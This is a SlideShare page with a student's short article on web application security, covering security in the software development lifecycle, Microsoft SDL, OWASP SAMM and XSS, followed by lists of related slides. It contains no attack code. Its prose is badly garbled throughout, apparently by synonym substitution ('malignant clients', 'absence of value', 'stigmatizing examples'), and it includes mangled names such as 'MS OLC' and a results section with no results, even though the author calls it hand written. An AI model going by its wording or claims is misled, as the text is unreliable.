SlideShare a Scribd company logo

Research Article On Web Application Security

S
SaadSaif6

This Is The Totally Hand Written Research Article On Web Application Security (Improving Critical Web-based Applications Quality Through In depth Security Analysis) This Research Article Was Made By Me After The Hard Working Of One Month. Its Best And Suitable For Your Research Paper And Also Used In Class For Present It And For Submission.

Education
1 of 6
Download to read offline
Web Application Security Improving Critical Web-based Applications Quality through in-depth Security Analysis SAAD SAIF Department Of Computer Sciences Lahore Garrison University Abstract The Internet, and specifically the World Wide Web, has gotten one of the most well-known correspondence mediums in the World. A huge number of clients associate regularly to various electronic applications to look for data, trade messages, communicate with one another, direct business, cover charges, perform money related activities and some more. A portion of these basic online administrations are focused by a few malignant clients expecting to abuse potential shortcomings and vulnerabilities, which could cause the disturbance of the administration, yet in addition bargain the clients and associations data. A large portion of the occasions, these noxious clients prevail with regards to abusing various kinds of vulnerabilities and the outcomes can be lamentable. Most of these vulnerabilities are legitimately related with the online applications absence of value therefore from an ineffectively executed programming advancement life cycle (SDLC). Keywords:- Web Application, Security, Automated Testing, Quality, Critical INTRODUCTION Security was, still and consistently will be one of the significant worries that basic frameworks have, particularly when sent in the World Wide Web, available through an internet browser. Presently a Days there are a giant proportion of organizations sent in the World Wide Web and individuals depend on this correspondence framework to per-structure regular tasks. Instances of these tasks are: charge installments, banking activities, e-shopping, email, government medicinal services framework activities, etc. Besides, in certain nations, these tasks are really required; one case of this is Portugal, where the open association organizations were totally sent in the Web targeting uniting government and resident. Most security concerns are currently related with the application level. This has one straightforward clarification, web applications are available through programs, and can be gotten to by everybody with
Internet. This has the intrinsic chance that great or seriously intentioned individuals can exploit this and perform malignant activities. The quantity of assaults reported by certain elements effectively affirms this. The National Institute of Standards and Technology (NIST) holds a National Vulnerability Database (NVD), which has more than 40000 vulnerabilities, distinguished in the application level as of March 13, 2010.This is moreover confirmed by the Gartner Gathering, which evaluates that 70% of the ambushes to an association's web application begin from the application level. WEB APPLICATIONS AS THE WEAKEST LINK Web applications no longer relates with back workplaces and home amusement. Nowadays, web applications have become the most significant applications throughout everybody's life and relates with most activities clients make in the Internet. Security experts regularly misjudge the genuine issues related with security blemishes these days - programming. Programming is the most fragile connection in security. Application level security relates with numerous issues inside this theme and it can't be limited to acceptable programming rehearses. Confirmation that security issues relate with programming is that, other than the quantity of utilization level vulnerabilities abused in the course of the most recent couple of years is developing, associations like OWASP , WASC, CERT PT, etc are turning into every day progressively dynamic and security experts are beginning to comprehend and accept absolutely their suggestions. Top 10 OWASP and the WASC risk gathering point precisely to the most notable application layer security issues, which get from an enormous experience from security specialists around the world. SECURITY INTEGRATION WITH THE SOLC The unconventionality and market demand in fundamental electronic applications has made an extension in the advancement of security models in the item improvement life cycle. One of the bases for these frameworks is that security must be accessible through every time of the SDLC thusly achieving quality as a last thing. This regularly includes correspondences and collaboration from top seats (CIO, CEO, and others), running down the chain of importance, through task administrators and designers. The purpose of this hierarchical mindfulness is basic, security is a procedure, not a last item, and ought to be managed thusly, incorporating encounters, dreams and worries from everybody. Microsoft Security Development Lifecycle (MS DLe) Microsoft's strategy is perhaps one of the most utilized in the business territory. This is generally determined by the way that their items are available through each market and advances, implementing the utilization of their examples. MS OLC is depicted by Microsoft as being flexible (applies to enormous, medium and little organizations, to different improvement systems and to any stage), savvy (they present an examination by NIST which guarantees that code fixes after the sending can go up to 30 time than if act in the advancement stage) and quantifiable (they present investigations contrasting the quantity of vulnerabilities and without their foundation).Building Security in Maturity Model (BSIMM)
OWASP Software Assurance Maturity Model (SAMM) The OWASP SAMM is a structure, which points helping associations to plan a security system for programming security. This system gives all the assets to free and helps in: • Assessing the current practices in the association related with programming security • Building a decent programming security confirmation program for explicit emphases • Exhibiting upgrades to a security confirmation program • Characterizing and estimating security-related exercises all through an association. Literature Review Over the latest couple of years, application-level vulnerabilities have been abused with real outcomes. Software engineers have misdirected online business regions into transportation stock for no charge, usernames and passwords have been harvested, and characterized information, (for instance, areas and MasterCard numbers) has been spilled. Scientists begin to research new instruments and procedures which address the issue of utilization level web security from numerous headings pre, inside, and post. Glisson and Well and in fight that security should be started first before the application progression process direct through a self-governing versatile system that contains customizable security parts. Literature Survey Among the numerous assaults on Web applications, cross-website scripting (XSS) is one of the most widely recognized. A XSS ambush incorporates mixing poisonous substance into a trusted in site that executes on a visitor's program without the visitor's data and in this manner enables the aggressor to get to unstable customer data, for instance, meeting tokens and treats set aside on the program. With this data, attackers can execute a couple of malignant acts, including misrepresentation, key-logging, phishing, customer emulate, and webcam incitation
Confusion Matrix Results In All Articles I read that the web applications are more secure and well defined applications which are best as web services which provided us by Google and other search engine. So there is also a lot of work which ion all web applications for their security and other harmful activities which can give harm them. So all experts work, analysis and testing on web applications and try to safe critical information which is not used by the third party. Title Improving Critical Web-based Applications Quality through in-depth Security Analysis Web Application Security Tools Analysis Tool-Based Approach to Assessing Web Application Security Semantic security against web application attacks Privacy Solutions
Conclusion Basic web applications quality can't be isolated from security issues. Security must be available in each basic web application as it is a quality measure each client take as allowed. In this paper we centered in the coordination of security rehearses in the SDLC. The SDLC targets stigmatizing examples and principles for creating programming with a better level. The coordination of security inside those models is imperative for these applications, and consequently, security exercises were characterized by each phase of the SDLC, prompting an expansion of web applications quality through the whole improvement process. Web applications are these days the door among individuals and regular activities with the whole world. This must be comprehended, and along these lines, quality norms must be raised, which from our perspective, it can just occur with the expansion of security. References [1] Backtrack (2011). Backtrack Linux - penetration testing distribution website. http://www.backtrack- linux.orgl. (Access date: IS June 2011) [2] Brunel D. Romero M., H. M. H. and A, 1. E. M. (2009). A methodological tool for asset identification in web applications. In IEEE Fourth International Conference on Software Engineering Advances, pages 413--418. IEEE. [3] BSIMM (2011). The building security in maturity model. http://bsimm.coml. (Access date: IS June 2011). [4] CERT.PT (2010). Cert.pt web site. http://www.cert.ptl. Consortium, W. AS. (2010a). (Access date: IS June 2011). [5] WASC Threat Classification version 2.0. WASC. Consortium, W. AS. (2010b). Web application security consortium web site. http://www.webappsec.orgl. (Access date: IS June 2011). [6] Duan, B., Zhang, Y., and Gun D. (2008). An easy-to-deploy penetration testing platform. In Young Computer Sci- enlists, 2008. ICYCS 2008. The 9th International Con- ference for, pages 2314 -2318. [7] Fong, E. and Okun, V. (2007). Web application scanners: Definitions and functions. In System Sciences, 2007. HICSS 2007. 40th Annual Hawaii International Con- ference on, page 280b. [8] Madan, S. and Madan, S. (2010). Security standards per- spective to fortify web database applications from code injection attack. In IEEE International Confer- ence on Intelligent Systems, Modeling and Simulation. IEEE.
Research Article On Web Application Security

Recommended

Research Paper
Research PaperResearch Paper
Research PaperDavid Chaponniere
 
Research challenges and issues in web security
Research challenges and issues in web securityResearch challenges and issues in web security
Research challenges and issues in web securityIAEME Publication
 
Contending Malware Threat using Hybrid Security Model
Contending Malware Threat using Hybrid Security ModelContending Malware Threat using Hybrid Security Model
Contending Malware Threat using Hybrid Security ModelIRJET Journal
 
Security Firm Program - Corporate College
Security Firm Program - Corporate CollegeSecurity Firm Program - Corporate College
Security Firm Program - Corporate CollegeWorkSmart Integrated Marketing
 
Ultimate_Guide_to_getting_started_with_AppSec
Ultimate_Guide_to_getting_started_with_AppSecUltimate_Guide_to_getting_started_with_AppSec
Ultimate_Guide_to_getting_started_with_AppSecJessica Lavery Pozerski
 
Unique Security Challenges in the Datacenter Demand Innovative Solutions
Unique Security Challenges in the Datacenter Demand Innovative SolutionsUnique Security Challenges in the Datacenter Demand Innovative Solutions
Unique Security Challenges in the Datacenter Demand Innovative SolutionsJuniper Networks
 
ultimate-guide-to-getting-started-with-appsec-veracode
ultimate-guide-to-getting-started-with-appsec-veracodeultimate-guide-to-getting-started-with-appsec-veracode
ultimate-guide-to-getting-started-with-appsec-veracodeSean Varga
 
Application Security: Safeguarding Data, Protecting Reputations
Application Security: Safeguarding Data, Protecting ReputationsApplication Security: Safeguarding Data, Protecting Reputations
Application Security: Safeguarding Data, Protecting ReputationsCognizant
 

Recommended

Research Paper
Research PaperResearch Paper
Research PaperDavid Chaponniere
 
Research challenges and issues in web security
Research challenges and issues in web securityResearch challenges and issues in web security
Research challenges and issues in web securityIAEME Publication
 
Contending Malware Threat using Hybrid Security Model
Contending Malware Threat using Hybrid Security ModelContending Malware Threat using Hybrid Security Model
Contending Malware Threat using Hybrid Security ModelIRJET Journal
 
Security Firm Program - Corporate College
Security Firm Program - Corporate CollegeSecurity Firm Program - Corporate College
Security Firm Program - Corporate CollegeWorkSmart Integrated Marketing
 
Ultimate_Guide_to_getting_started_with_AppSec
Ultimate_Guide_to_getting_started_with_AppSecUltimate_Guide_to_getting_started_with_AppSec
Ultimate_Guide_to_getting_started_with_AppSecJessica Lavery Pozerski
 
Unique Security Challenges in the Datacenter Demand Innovative Solutions
Unique Security Challenges in the Datacenter Demand Innovative SolutionsUnique Security Challenges in the Datacenter Demand Innovative Solutions
Unique Security Challenges in the Datacenter Demand Innovative SolutionsJuniper Networks
 
ultimate-guide-to-getting-started-with-appsec-veracode
ultimate-guide-to-getting-started-with-appsec-veracodeultimate-guide-to-getting-started-with-appsec-veracode
ultimate-guide-to-getting-started-with-appsec-veracodeSean Varga
 
Application Security: Safeguarding Data, Protecting Reputations
Application Security: Safeguarding Data, Protecting ReputationsApplication Security: Safeguarding Data, Protecting Reputations
Application Security: Safeguarding Data, Protecting ReputationsCognizant
 
IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDY
IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDYIMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDY
IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDYijwscjournal
 
How can we predict vulnerabilities to prevent them from causing data losses
How can we predict vulnerabilities to prevent them from causing data lossesHow can we predict vulnerabilities to prevent them from causing data losses
How can we predict vulnerabilities to prevent them from causing data lossesAbhishek BV
 
Turning the Tables on Cyber Attacks
Turning the Tables on Cyber AttacksTurning the Tables on Cyber Attacks
Turning the Tables on Cyber Attacks- Mark - Fullbright
 
An Empirical Study on the Security Measurements of Websites of Jordanian Publ...
An Empirical Study on the Security Measurements of Websites of Jordanian Publ...An Empirical Study on the Security Measurements of Websites of Jordanian Publ...
An Empirical Study on the Security Measurements of Websites of Jordanian Publ...CSCJournals
 
Whitepaper: BATTLING IT OUT: APPLICATION AND MOBILE SECURITY - Happiest Minds
Whitepaper: BATTLING IT OUT: APPLICATION AND MOBILE SECURITY - Happiest MindsWhitepaper: BATTLING IT OUT: APPLICATION AND MOBILE SECURITY - Happiest Minds
Whitepaper: BATTLING IT OUT: APPLICATION AND MOBILE SECURITY - Happiest MindsHappiest Minds Technologies
 
web security
web securityweb security
web securityMyprivateresearcher.com
 
Cisco 2014 Midyear Security Report
Cisco 2014 Midyear Security ReportCisco 2014 Midyear Security Report
Cisco 2014 Midyear Security ReportCisco Security
 
Survey of different Web Application Attacks & Its Preventive Measures
Survey of different Web Application Attacks & Its Preventive MeasuresSurvey of different Web Application Attacks & Its Preventive Measures
Survey of different Web Application Attacks & Its Preventive MeasuresIOSR Journals
 
Whitepaper - CISO Guide_6pp
Whitepaper - CISO Guide_6ppWhitepaper - CISO Guide_6pp
Whitepaper - CISO Guide_6ppEric Zhuo
 
2013 Mobile Application Security Survey
2013 Mobile Application Security Survey2013 Mobile Application Security Survey
2013 Mobile Application Security SurveyBee_Ware
 
Wp evolving-threats-endpoint-security
Wp evolving-threats-endpoint-securityWp evolving-threats-endpoint-security
Wp evolving-threats-endpoint-securityAi K
 
State of Web Application Security by Ponemon Institute
State of Web Application Security by Ponemon InstituteState of Web Application Security by Ponemon Institute
State of Web Application Security by Ponemon InstituteJeremiah Grossman
 
The Shifting State of Endpoint Risk: Key Strategies to Implement in 2011
The Shifting State of Endpoint Risk: Key Strategies to Implement in 2011The Shifting State of Endpoint Risk: Key Strategies to Implement in 2011
The Shifting State of Endpoint Risk: Key Strategies to Implement in 2011Lumension
 
CYBER SECURITY: A SURVEY ON ISSUES AND SOLUTIONS
CYBER SECURITY: A SURVEY ON ISSUES AND SOLUTIONSCYBER SECURITY: A SURVEY ON ISSUES AND SOLUTIONS
CYBER SECURITY: A SURVEY ON ISSUES AND SOLUTIONSIAEME Publication
 
Rational Unified Treatment for Web Application Vulnerability Assessment
Rational Unified Treatment for Web Application Vulnerability AssessmentRational Unified Treatment for Web Application Vulnerability Assessment
Rational Unified Treatment for Web Application Vulnerability AssessmentVESIT/University of Mumbai
 
Bitdefender - Solution Paper - Active Threat Control
Bitdefender - Solution Paper - Active Threat ControlBitdefender - Solution Paper - Active Threat Control
Bitdefender - Solution Paper - Active Threat ControlJose Lopez
 
An efficient control of virus propagation
An efficient control of virus propagationAn efficient control of virus propagation
An efficient control of virus propagationUltraUploader
 
A Review paper on Securing PHP based websites From Web Application Vulnerabil...
A Review paper on Securing PHP based websites From Web Application Vulnerabil...A Review paper on Securing PHP based websites From Web Application Vulnerabil...
A Review paper on Securing PHP based websites From Web Application Vulnerabil...Editor IJMTER
 
Top 6 Web Application Security Best Practices.pdf
Top 6 Web Application Security Best Practices.pdfTop 6 Web Application Security Best Practices.pdf
Top 6 Web Application Security Best Practices.pdfSolviosTechnology
 
IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDY
IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDYIMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDY
IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDYijwscjournal
 
University-of-Miami_MEDINA
University-of-Miami_MEDINAUniversity-of-Miami_MEDINA
University-of-Miami_MEDINAKelvin Medina, CISSP, PA-QSA, QSA, GCIH, CISA, ITIL
 
Web app penetration testing best methods tools used
Web app penetration testing best methods tools usedWeb app penetration testing best methods tools used
Web app penetration testing best methods tools usedZoe Gilbert
 

More Related Content

What's hot

IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDY
IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDYIMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDY
IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDYijwscjournal
 
How can we predict vulnerabilities to prevent them from causing data losses
How can we predict vulnerabilities to prevent them from causing data lossesHow can we predict vulnerabilities to prevent them from causing data losses
How can we predict vulnerabilities to prevent them from causing data lossesAbhishek BV
 
Turning the Tables on Cyber Attacks
Turning the Tables on Cyber AttacksTurning the Tables on Cyber Attacks
Turning the Tables on Cyber Attacks- Mark - Fullbright
 
An Empirical Study on the Security Measurements of Websites of Jordanian Publ...
An Empirical Study on the Security Measurements of Websites of Jordanian Publ...An Empirical Study on the Security Measurements of Websites of Jordanian Publ...
An Empirical Study on the Security Measurements of Websites of Jordanian Publ...CSCJournals
 
Whitepaper: BATTLING IT OUT: APPLICATION AND MOBILE SECURITY - Happiest Minds
Whitepaper: BATTLING IT OUT: APPLICATION AND MOBILE SECURITY - Happiest MindsWhitepaper: BATTLING IT OUT: APPLICATION AND MOBILE SECURITY - Happiest Minds
Whitepaper: BATTLING IT OUT: APPLICATION AND MOBILE SECURITY - Happiest MindsHappiest Minds Technologies
 
Cisco 2014 Midyear Security Report
Cisco 2014 Midyear Security ReportCisco 2014 Midyear Security Report
Cisco 2014 Midyear Security ReportCisco Security
 
Survey of different Web Application Attacks & Its Preventive Measures
Survey of different Web Application Attacks & Its Preventive MeasuresSurvey of different Web Application Attacks & Its Preventive Measures
Survey of different Web Application Attacks & Its Preventive MeasuresIOSR Journals
 
Whitepaper - CISO Guide_6pp
Whitepaper - CISO Guide_6ppWhitepaper - CISO Guide_6pp
Whitepaper - CISO Guide_6ppEric Zhuo
 
2013 Mobile Application Security Survey
2013 Mobile Application Security Survey2013 Mobile Application Security Survey
2013 Mobile Application Security SurveyBee_Ware
 
Wp evolving-threats-endpoint-security
Wp evolving-threats-endpoint-securityWp evolving-threats-endpoint-security
Wp evolving-threats-endpoint-securityAi K
 
State of Web Application Security by Ponemon Institute
State of Web Application Security by Ponemon InstituteState of Web Application Security by Ponemon Institute
State of Web Application Security by Ponemon InstituteJeremiah Grossman
 
The Shifting State of Endpoint Risk: Key Strategies to Implement in 2011
The Shifting State of Endpoint Risk: Key Strategies to Implement in 2011The Shifting State of Endpoint Risk: Key Strategies to Implement in 2011
The Shifting State of Endpoint Risk: Key Strategies to Implement in 2011Lumension
 
CYBER SECURITY: A SURVEY ON ISSUES AND SOLUTIONS
CYBER SECURITY: A SURVEY ON ISSUES AND SOLUTIONSCYBER SECURITY: A SURVEY ON ISSUES AND SOLUTIONS
CYBER SECURITY: A SURVEY ON ISSUES AND SOLUTIONSIAEME Publication
 
Rational Unified Treatment for Web Application Vulnerability Assessment
Rational Unified Treatment for Web Application Vulnerability AssessmentRational Unified Treatment for Web Application Vulnerability Assessment
Rational Unified Treatment for Web Application Vulnerability AssessmentVESIT/University of Mumbai
 
Bitdefender - Solution Paper - Active Threat Control
Bitdefender - Solution Paper - Active Threat ControlBitdefender - Solution Paper - Active Threat Control
Bitdefender - Solution Paper - Active Threat ControlJose Lopez
 
An efficient control of virus propagation
An efficient control of virus propagationAn efficient control of virus propagation
An efficient control of virus propagationUltraUploader
 
A Review paper on Securing PHP based websites From Web Application Vulnerabil...
A Review paper on Securing PHP based websites From Web Application Vulnerabil...A Review paper on Securing PHP based websites From Web Application Vulnerabil...
A Review paper on Securing PHP based websites From Web Application Vulnerabil...Editor IJMTER
 

What's hot (18)

IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDY
IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDYIMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDY
IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDY
 
How can we predict vulnerabilities to prevent them from causing data losses
How can we predict vulnerabilities to prevent them from causing data lossesHow can we predict vulnerabilities to prevent them from causing data losses
How can we predict vulnerabilities to prevent them from causing data losses
 
Turning the Tables on Cyber Attacks
Turning the Tables on Cyber AttacksTurning the Tables on Cyber Attacks
Turning the Tables on Cyber Attacks
 
An Empirical Study on the Security Measurements of Websites of Jordanian Publ...
An Empirical Study on the Security Measurements of Websites of Jordanian Publ...An Empirical Study on the Security Measurements of Websites of Jordanian Publ...
An Empirical Study on the Security Measurements of Websites of Jordanian Publ...
 
Whitepaper: BATTLING IT OUT: APPLICATION AND MOBILE SECURITY - Happiest Minds
Whitepaper: BATTLING IT OUT: APPLICATION AND MOBILE SECURITY - Happiest MindsWhitepaper: BATTLING IT OUT: APPLICATION AND MOBILE SECURITY - Happiest Minds
Whitepaper: BATTLING IT OUT: APPLICATION AND MOBILE SECURITY - Happiest Minds
 
web security
web securityweb security
web security
 
Cisco 2014 Midyear Security Report
Cisco 2014 Midyear Security ReportCisco 2014 Midyear Security Report
Cisco 2014 Midyear Security Report
 
Survey of different Web Application Attacks & Its Preventive Measures
Survey of different Web Application Attacks & Its Preventive MeasuresSurvey of different Web Application Attacks & Its Preventive Measures
Survey of different Web Application Attacks & Its Preventive Measures
 
Whitepaper - CISO Guide_6pp
Whitepaper - CISO Guide_6ppWhitepaper - CISO Guide_6pp
Whitepaper - CISO Guide_6pp
 
2013 Mobile Application Security Survey
2013 Mobile Application Security Survey2013 Mobile Application Security Survey
2013 Mobile Application Security Survey
 
Wp evolving-threats-endpoint-security
Wp evolving-threats-endpoint-securityWp evolving-threats-endpoint-security
Wp evolving-threats-endpoint-security
 
State of Web Application Security by Ponemon Institute
State of Web Application Security by Ponemon InstituteState of Web Application Security by Ponemon Institute
State of Web Application Security by Ponemon Institute
 
The Shifting State of Endpoint Risk: Key Strategies to Implement in 2011
The Shifting State of Endpoint Risk: Key Strategies to Implement in 2011The Shifting State of Endpoint Risk: Key Strategies to Implement in 2011
The Shifting State of Endpoint Risk: Key Strategies to Implement in 2011
 
CYBER SECURITY: A SURVEY ON ISSUES AND SOLUTIONS
CYBER SECURITY: A SURVEY ON ISSUES AND SOLUTIONSCYBER SECURITY: A SURVEY ON ISSUES AND SOLUTIONS
CYBER SECURITY: A SURVEY ON ISSUES AND SOLUTIONS
 
Rational Unified Treatment for Web Application Vulnerability Assessment
Rational Unified Treatment for Web Application Vulnerability AssessmentRational Unified Treatment for Web Application Vulnerability Assessment
Rational Unified Treatment for Web Application Vulnerability Assessment
 
Bitdefender - Solution Paper - Active Threat Control
Bitdefender - Solution Paper - Active Threat ControlBitdefender - Solution Paper - Active Threat Control
Bitdefender - Solution Paper - Active Threat Control
 
An efficient control of virus propagation
An efficient control of virus propagationAn efficient control of virus propagation
An efficient control of virus propagation
 
A Review paper on Securing PHP based websites From Web Application Vulnerabil...
A Review paper on Securing PHP based websites From Web Application Vulnerabil...A Review paper on Securing PHP based websites From Web Application Vulnerabil...
A Review paper on Securing PHP based websites From Web Application Vulnerabil...
 

Similar to Research Article On Web Application Security

Top 6 Web Application Security Best Practices.pdf
Top 6 Web Application Security Best Practices.pdfTop 6 Web Application Security Best Practices.pdf
Top 6 Web Application Security Best Practices.pdfSolviosTechnology
 
IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDY
IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDYIMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDY
IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDYijwscjournal
 
Web app penetration testing best methods tools used
Web app penetration testing best methods tools usedWeb app penetration testing best methods tools used
Web app penetration testing best methods tools usedZoe Gilbert
 
OverseeCyberSecurityAsHackersSeekToInfiltrate
OverseeCyberSecurityAsHackersSeekToInfiltrateOverseeCyberSecurityAsHackersSeekToInfiltrate
OverseeCyberSecurityAsHackersSeekToInfiltrateKashif Ali
 
Veracode Corporate Overview - Print
Veracode Corporate Overview - PrintVeracode Corporate Overview - Print
Veracode Corporate Overview - PrintAndrew Kanikuru
 
A Resiliency Framework For An Enterprise Cloud
A Resiliency Framework For An Enterprise CloudA Resiliency Framework For An Enterprise Cloud
A Resiliency Framework For An Enterprise CloudJeff Nelson
 
Unified application security analyser
Unified application security analyserUnified application security analyser
Unified application security analyserTim Youm
 
Application Security in Times of Globalization
Application Security in Times of GlobalizationApplication Security in Times of Globalization
Application Security in Times of GlobalizationAujas Networks Pvt. Ltd.
 
Intelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software SecurityIntelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software SecurityTyler Shields
 
Cisco_eBook_ShiftLeftSecurity_2022_06_07a.pdf
Cisco_eBook_ShiftLeftSecurity_2022_06_07a.pdfCisco_eBook_ShiftLeftSecurity_2022_06_07a.pdf
Cisco_eBook_ShiftLeftSecurity_2022_06_07a.pdfNathanDjami
 
Security-First Development_ Safeguarding Your Software from Threats.pdf
Security-First Development_ Safeguarding Your Software from Threats.pdfSecurity-First Development_ Safeguarding Your Software from Threats.pdf
Security-First Development_ Safeguarding Your Software from Threats.pdfTyrion Lannister
 
Key elements of security threat
Key elements of security threatKey elements of security threat
Key elements of security threatAraf Karsh Hamid
 
Why security is the kidney not the tail of the dog v3
Why security is the kidney not the tail of the dog v3Why security is the kidney not the tail of the dog v3
Why security is the kidney not the tail of the dog v3Ernest Staats
 
Research Paper TopicITS835 – Enterprise Risk Managemen.docx
Research Paper TopicITS835 – Enterprise Risk Managemen.docxResearch Paper TopicITS835 – Enterprise Risk Managemen.docx
Research Paper TopicITS835 – Enterprise Risk Managemen.docxaudeleypearl
 
AbstractCloud computing technology has become the new fron.docx
AbstractCloud computing technology has become the new fron.docxAbstractCloud computing technology has become the new fron.docx
AbstractCloud computing technology has become the new fron.docxSALU18
 
Web Application Security.pptx
Web Application Security.pptxWeb Application Security.pptx
Web Application Security.pptxGenic Solutions
 
Website Security Testing Ahmedabad Mar 2024.pdf
Website Security Testing Ahmedabad Mar 2024.pdfWebsite Security Testing Ahmedabad Mar 2024.pdf
Website Security Testing Ahmedabad Mar 2024.pdfBella Nirvana Center
 
Strategies for Effective Cybersecurity in Web Development pdf.pdf
Strategies for Effective Cybersecurity in Web Development pdf.pdfStrategies for Effective Cybersecurity in Web Development pdf.pdf
Strategies for Effective Cybersecurity in Web Development pdf.pdfLondonAtil1
 

Similar to Research Article On Web Application Security (20)

Top 6 Web Application Security Best Practices.pdf
Top 6 Web Application Security Best Practices.pdfTop 6 Web Application Security Best Practices.pdf
Top 6 Web Application Security Best Practices.pdf
 
IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDY
IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDYIMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDY
IMPLEMENTATION OF MOSRE FRAMEWORK FOR A WEB APPLICATION - A CASE STUDY
 
University-of-Miami_MEDINA
University-of-Miami_MEDINAUniversity-of-Miami_MEDINA
University-of-Miami_MEDINA
 
Web app penetration testing best methods tools used
Web app penetration testing best methods tools usedWeb app penetration testing best methods tools used
Web app penetration testing best methods tools used
 
OverseeCyberSecurityAsHackersSeekToInfiltrate
OverseeCyberSecurityAsHackersSeekToInfiltrateOverseeCyberSecurityAsHackersSeekToInfiltrate
OverseeCyberSecurityAsHackersSeekToInfiltrate
 
Veracode Corporate Overview - Print
Veracode Corporate Overview - PrintVeracode Corporate Overview - Print
Veracode Corporate Overview - Print
 
A Resiliency Framework For An Enterprise Cloud
A Resiliency Framework For An Enterprise CloudA Resiliency Framework For An Enterprise Cloud
A Resiliency Framework For An Enterprise Cloud
 
Unified application security analyser
Unified application security analyserUnified application security analyser
Unified application security analyser
 
Application Security in Times of Globalization
Application Security in Times of GlobalizationApplication Security in Times of Globalization
Application Security in Times of Globalization
 
Intelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software SecurityIntelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software Security
 
Cisco_eBook_ShiftLeftSecurity_2022_06_07a.pdf
Cisco_eBook_ShiftLeftSecurity_2022_06_07a.pdfCisco_eBook_ShiftLeftSecurity_2022_06_07a.pdf
Cisco_eBook_ShiftLeftSecurity_2022_06_07a.pdf
 
Security-First Development_ Safeguarding Your Software from Threats.pdf
Security-First Development_ Safeguarding Your Software from Threats.pdfSecurity-First Development_ Safeguarding Your Software from Threats.pdf
Security-First Development_ Safeguarding Your Software from Threats.pdf
 
Key elements of security threat
Key elements of security threatKey elements of security threat
Key elements of security threat
 
Why security is the kidney not the tail of the dog v3
Why security is the kidney not the tail of the dog v3Why security is the kidney not the tail of the dog v3
Why security is the kidney not the tail of the dog v3
 
V01 i010413
V01 i010413V01 i010413
V01 i010413
 
Research Paper TopicITS835 – Enterprise Risk Managemen.docx
Research Paper TopicITS835 – Enterprise Risk Managemen.docxResearch Paper TopicITS835 – Enterprise Risk Managemen.docx
Research Paper TopicITS835 – Enterprise Risk Managemen.docx
 
AbstractCloud computing technology has become the new fron.docx
AbstractCloud computing technology has become the new fron.docxAbstractCloud computing technology has become the new fron.docx
AbstractCloud computing technology has become the new fron.docx
 
Web Application Security.pptx
Web Application Security.pptxWeb Application Security.pptx
Web Application Security.pptx
 
Website Security Testing Ahmedabad Mar 2024.pdf
Website Security Testing Ahmedabad Mar 2024.pdfWebsite Security Testing Ahmedabad Mar 2024.pdf
Website Security Testing Ahmedabad Mar 2024.pdf
 
Strategies for Effective Cybersecurity in Web Development pdf.pdf
Strategies for Effective Cybersecurity in Web Development pdf.pdfStrategies for Effective Cybersecurity in Web Development pdf.pdf
Strategies for Effective Cybersecurity in Web Development pdf.pdf
 

More from SaadSaif6

Fourier transform (cell phones)
Fourier transform (cell phones)Fourier transform (cell phones)
Fourier transform (cell phones)SaadSaif6
 
Correlation Coefficient
Correlation CoefficientCorrelation Coefficient
Correlation CoefficientSaadSaif6
 
America-Iran Tensions ( Best & Easy Presentation )
America-Iran Tensions ( Best & Easy Presentation )America-Iran Tensions ( Best & Easy Presentation )
America-Iran Tensions ( Best & Easy Presentation )SaadSaif6
 
Review Paper ( Research Articles )
Review Paper ( Research Articles )Review Paper ( Research Articles )
Review Paper ( Research Articles )SaadSaif6
 
Artificial Intelligence Presentation
Artificial Intelligence PresentationArtificial Intelligence Presentation
Artificial Intelligence PresentationSaadSaif6
 
Trapezoidal Rule
Trapezoidal RuleTrapezoidal Rule
Trapezoidal RuleSaadSaif6
 
Network Topology And Its Types
Network Topology And Its TypesNetwork Topology And Its Types
Network Topology And Its TypesSaadSaif6
 

More from SaadSaif6 (7)

Fourier transform (cell phones)
Fourier transform (cell phones)Fourier transform (cell phones)
Fourier transform (cell phones)
 
Correlation Coefficient
Correlation CoefficientCorrelation Coefficient
Correlation Coefficient
 
America-Iran Tensions ( Best & Easy Presentation )
America-Iran Tensions ( Best & Easy Presentation )America-Iran Tensions ( Best & Easy Presentation )
America-Iran Tensions ( Best & Easy Presentation )
 
Review Paper ( Research Articles )
Review Paper ( Research Articles )Review Paper ( Research Articles )
Review Paper ( Research Articles )
 
Artificial Intelligence Presentation
Artificial Intelligence PresentationArtificial Intelligence Presentation
Artificial Intelligence Presentation
 
Trapezoidal Rule
Trapezoidal RuleTrapezoidal Rule
Trapezoidal Rule
 
Network Topology And Its Types
Network Topology And Its TypesNetwork Topology And Its Types
Network Topology And Its Types
 

Recently uploaded

